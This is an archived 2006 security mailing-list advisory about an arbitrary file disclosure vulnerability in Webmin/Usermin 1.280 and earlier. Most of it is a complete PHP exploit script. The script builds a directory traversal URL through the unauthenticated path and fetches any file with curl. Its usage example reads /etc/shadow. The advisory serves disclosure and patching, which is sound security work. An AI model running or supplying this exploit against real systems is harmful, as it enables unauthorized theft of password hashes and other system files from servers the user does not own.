[EXPL] Webmin Usermin Arbitrary File Disclosure Vulnerability (Exploit)
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 10 Jul 2006 19:06:20 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Webmin Usermin Arbitrary File Disclosure Vulnerability (Exploit)
------------------------------------------------------------------------
SUMMARY
" <http://www.webmin.com/> Webmin is a web-based interface for system
administration for Unix."
Improper design allows attackers to gain information about a system using
Webmin.
DETAILS
Vulnerable Systems:
* Webmin Webmin version 1.280 and prior
Immune Systems:
* Webmin Webmin version 1.290
* Webmin Webmin version 1.220
Exploit:
<?php
/*
Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability
Date : 2006-06-30
Patch : update to version 1.290
Advisory :
http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html
Coded by joffer , http://securitydot.net
*/
$host = $argv[1];
$port = $argv[2];
$http = $argv[3];
$file = $argv[4];
// CHECKING THE INPUT
if($host != "" && $port != "" && $http != "" && $file != "") {
$z = "/..%01";
for ($i=0;$i<60;$i++) {
$z.="/..%01";
}
$target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file."";
echo "Attacking ".$host."\n";
echo "---------------------------------\n";
// INITIALIZING CURL SESSION TO THE TARGET
$ch = curl_init();
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $target);
curl_setopt ($ch, CURLOPT_TIMEOUT, '10');
curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE);
$content = curl_exec($ch);
curl_close ($ch);
// CLOSING CURL
// ECHOING THE CONTENT OF THE $FILE
echo $content;
echo "---------------------------------\n";
echo "Coded by joffer , http://securitydot.net\n";;
} else {
// IF INPUT IS NOT CORRECT DISPLAY THE README
echo "Usage php webmin.php HOST PORT HTTP/HTTPS FILE\n";
echo "Example : php webmin.php localhost 10000 http /etc/shadow\n";
echo "Coded by joffer , http://securitydot.net\n";;
}
?>
ADDITIONAL INFORMATION
The information has been provided by <mailto:joffer@xxxxxxxxx> Alexander
Hristov.
The original article can be found at:
<http://securitydot.net/xpl/exploits/vulnerabilities/articles/1152/exploit.html> http://securitydot.net/xpl/exploits/vulnerabilities/articles/1152/exploit.html
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NT] Horde Multiple XSS
- Next by Date: [NEWS] Sparklet Format String
- Previous by thread: [NT] Horde Multiple XSS
- Next by thread: [NEWS] Sparklet Format String
- Index(es):
Relevant Pages
|
